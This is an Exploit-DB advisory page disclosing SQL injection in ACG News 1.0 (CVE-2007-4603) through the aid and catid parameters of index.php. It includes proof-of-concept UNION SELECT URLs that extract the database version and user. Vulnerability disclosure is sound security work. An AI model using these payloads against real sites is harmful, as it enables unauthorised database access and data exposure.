ACG News 1.0 - 'aid'/'catid' SQL Injection

EDB-ID:

4330

CVE:

2007-4603

EDB Verified:

Author:

SmOk3

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2007-08-28

Vulnerable App: 
ACG News SQL Injection

Software: ACG News 1.0
Vendor link: http://www.altercoder.com
Vendor Demo link: http://acgnews.uw.hu/index.php
Attack: SQL Injection

Original Advisory:
http://14house.blogspot.com/2007/08/acg-news-sql-injection.html

Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >

SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable
system. This may compromise the integrity of your database and/or
expose sensitive information. Vulnerable variables are $aid and $catid
on index.php file.

Proof of Concept:
index.php?menu=showarticle&aid=[SQL INJECTION]
index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7

index.php?menu=showcat&catid=[SQL INJECTION]
index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version


Solution:

Your script should filter metacharacters from user input.


Vendor contacted but I'm waiting for reply.

# milw0rm.com [2007-08-28]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services